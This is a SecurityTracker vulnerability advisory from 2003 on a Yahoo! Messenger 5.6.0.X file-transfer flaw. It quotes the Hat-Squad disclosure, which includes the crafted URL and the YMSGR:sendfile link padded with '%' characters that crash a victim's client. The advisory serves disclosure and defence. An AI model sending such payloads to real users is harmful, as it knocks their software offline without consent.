SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Sign Up!





Category:  Application (Instant Messaging/IRC/Chat)  >  Yahoo Messenger Vendors:  Yahoo
Yahoo! Messenger File Transfer Flaw Lets Remote Users Crash the Target User's Client
SecurityTracker Alert ID:  1008008
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Oct 27 2003
Impact:  Denial of service via network
Exploit Included:  Yes  
Version(s): 5.6.0.X
Description:  A vulnerability was reported in Yahoo! Messenger. A remote user can cause a target user's client to crash.

Hat-Squad Security Research Team reported that there is a flaw in the File Transfer option that allows a remote user to cause a target user's client to crash if the target user accepts a specially crafted transfer. The remote user can send a file transfer request to a target user with the target user's ID value composed of the target user's actual ID followed by more than 73 '%' characters. The '%' characters are reportedly filtered by the Messenger service but will trigger the crash.

According to the report, the '?' and '&' characters can also be used.

A demonstration exploit example is provided in the Source Message.

Impact:  A remote user can cause a target user's Yahoo! Messenger client to crash when the target user accepts a specially crafted file transfer request.
Solution:  No solution was available at the time of this entry.
Vendor URL:  messenger.yahoo.com/ (Links to External Site)
Cause:  Exception handling error
Underlying OS:  Windows (Any)
Reported By:  Hat-Squad Security Team <service@hat-squad.com>
Message History:   None.


 Source Message Contents

Date:  26 Oct 2003 08:35:59 -0000
From:  Hat-Squad Security Team <service@hat-squad.com>
Subject:  Buffer Overflow in Yahoo messenger Client

 



Date:
Oct 26, 2003

Title:
Buffer Overflow in Yahoo messenger Client

Vulnerable systems:
Yahoo! Messenger version 5.6.0.X
 
Summary:
Vulnerability in Yahoo Messenger File Transfer option allows a remote attacker to shut down the victi
m client. Details: The Yahoo messenger service filters some special characters in YahooID field like (x,&,?).When at
tacker initiates a file send request to victimID%%%%%%%%%(more than 73 chars), the service filters % chars and prompts "victi
mID" for an incoming file transfer session.If victim accepts the incoming file, his client will be shut down with access violat
ion error. The access violation accurse in FT.DLL that is responsible for p2p YM file transfers. sample download URL that the attacker client sends to victim machine : http://10.10.10.1:81/Messenger.victimid%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%2
5%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%
25%25%25%25%25%25%25%25%25%25%25%25%25%25%25% 25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25
%25%25%25%25%25%25%25%25%25%25%25%25%25%25.1066206307331File.txt?AppID=Messenger&UserID=victimid%
25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%2 5%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%
25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25
%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25 %25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25&K=lc9ly5954h9doeawsg31h9tgta6c7dtod8bqxrt2
vykgw5e5j9dao0o9doeawsg31h9t8vey6uq19 6y 14 53 Messenger.vicitimid%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%.1066377306549File.TXT the above url is encoded. Example: Use this link YMSGR:sendfile?[victim_yahooID]+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%&c%c:\[somefile] while you are logged into YM(note that the length of victim_yahooID plus %(or ? or &) chars must
be more than 73 chars.) It will fire a YM file transfer window.if the victim accepts your file,his client will be closed. Found by: Pejman davarzany pejman@hat-squad.com Hat-Squad Security Research Team (www.hat-squad.com)


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC